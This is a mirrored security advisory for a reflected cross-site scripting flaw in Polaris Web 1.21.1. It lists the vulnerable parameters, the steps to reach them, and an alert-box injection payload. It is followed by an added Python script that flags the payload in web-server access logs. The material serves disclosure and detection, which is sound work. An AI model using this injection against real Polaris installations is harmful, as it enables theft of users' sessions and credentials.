Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023070070

Below is a copy:

Polaris Web 1.21.1 - Reflected XSS
# Exploit Title: Polaris Web 1.21.1 - Reflected XSS
# Exploit Author: mahdi eidi
# Date: 2023-07-09
# Vendor: Siap+Micros S.p.A.
# Technology: PHP
# Vendor Homepage: https://www.siapmicros.com/en/application/
# Tested on: Kali Linux
# Impact: Manipulation of the site's JavaScript content
## Description
An attacker can inject his own malicious JavaScript code into vulnerable parameters and can also perform various actions, such as stealing the victim's session token or other users' login credentials.
# Technical Details & POC
1- Log in to the web site
2- Find a parameter to inject the RXSS payload into [destination, format, daily_day, sort...]
3- Payload: '"><img/src/onerror=alert(1)>'
4- Sample path: [https://exampel.com/polaris/custom-synoptic?format= RXSS Payload Inject]
5- Send the GET request
6- Boom! The alert payload fires
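
For defenders, the requests described above leave a recognizable trace in web-server access logs. The following is an added example, not part of the original advisory or the vendor's code: it flags requests under /polaris/ in which one of the parameters the advisory names carries HTML metacharacters after percent-decoding, including nested encoding. The combined log format, the /polaris/ mount path, the sample log lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Parameters the advisory names; its list ends in "...", so this set is incomplete.
WATCHED_PARAMS = {"destination", "format", "daily_day", "sort"}
# Characters needed to close an attribute or open a tag. A bare apostrophe in
# legitimate data will also match, so treat hits as leads to triage.
MARKUP = re.compile(r"[<>\"']")
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Jul/2023:10:00:01 +0000] "GET /polaris/custom-synoptic?format=pdf&sort=asc HTTP/1.1" 200 5120',
    '192.0.2.11 - - [09/Jul/2023:10:00:07 +0000] "GET /polaris/custom-synoptic?format=%27%22%3E%3Cimg/src/onerror=alert(1)%3E HTTP/1.1" 200 5188',
    '192.0.2.12 - - [09/Jul/2023:10:00:09 +0000] "GET /polaris/custom-synoptic?daily_day=%2522%253E&sort=%253Cb%253E HTTP/1.1" 200 5130',
    '192.0.2.13 - - [09/Jul/2023:10:00:12 +0000] "GET /static/help?format=%3Cb%3E HTTP/1.1" 404 312',
]


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%253C -> %3C -> <), with a bounded loop."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return the watched parameters whose decoded value carries markup characters."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    parts = urlsplit(match.group("target"))
    # Assumed mount path, taken from the advisory's sample URL.
    if not parts.path.startswith("/polaris/"):
        return []
    hits = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in WATCHED_PARAMS and MARKUP.search(fully_decode(value)):
            hits.add(name)
    return sorted(hits)


def scan(lines):
    """Map line index -> flagged parameter names, for lines with at least one hit."""
    return {i: p for i, line in enumerate(lines) if (p := suspicious_params(line))}
```

A hit only shows that markup characters reached a watched parameter; whether the response reflected them unencoded still has to be confirmed against the application.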
